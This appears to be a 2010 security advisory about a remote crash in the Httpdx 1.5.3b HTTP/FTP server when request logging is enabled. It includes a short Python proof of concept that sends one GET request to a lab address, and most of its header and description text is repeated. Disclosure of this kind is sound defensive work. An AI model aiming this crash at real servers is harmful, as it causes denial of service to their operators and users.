Vulnerability Httpdx v1.5.3bMar 19 2010 02:48PM Mehdi Mahdjoub - Sysdream IT Security Services (m mahdjoub sysdream com)
Program : Httpdx v1.5.3b
PoC : Remote Crash Service (if http.log=1)
Homepage : http://sourceforge.net/projects/httpdx/
Found by : Jonathan Salwan
This Advisory : Jonathan Salwan
Contact : j.salwan (at) sysdream (dot) com [email concealed]
//----- Application description
Single-process HTTP1.1/FTP server; no threads or processes started per
connection, runs with only few threads. Includes directory listing,
virtual hosting, basic auth., support for PHP, Perl, Python, SSI, etc.
All settings in one config/script file.
//----- Description of vulnerability
The vulnerability is caused due to set http.log=1 in httpdx.conf - Error
Writting log
This can be exploited to crash all services http & ftp.
Program : Httpdx v1.5.3b
PoC : Remote Crash Service (if http.log=1)
Homepage : http://sourceforge.net/projects/httpdx/
Found by : Jonathan Salwan
This Advisory : Jonathan Salwan
Contact : j.salwan (at) sysdream (dot) com [email concealed]
//----- Application description
Single-process HTTP1.1/FTP server; no threads or processes started per
connection, runs with only few threads. Includes directory listing,
virtual hosting, basic auth., support for PHP, Perl, Python, SSI, etc.
All settings in one config/script file.
//----- Description of vulnerability
The vulnerability is caused due to set http.log=1 in httpdx.conf - Error
Writting log
This can be exploited to crash all services http & ftp.
Use simple GET request for crash service.
//----- Credits
http://www.sysdream.com/article.php?story_id=325§ion_id=78
http://www.shell-storm.org
import urllib
import urllib2
url = 'http://172.16.240.128/'
req = urllib2.Request(url)
answer = urllib2.urlopen(req)
page = answer.read()
[ reply ]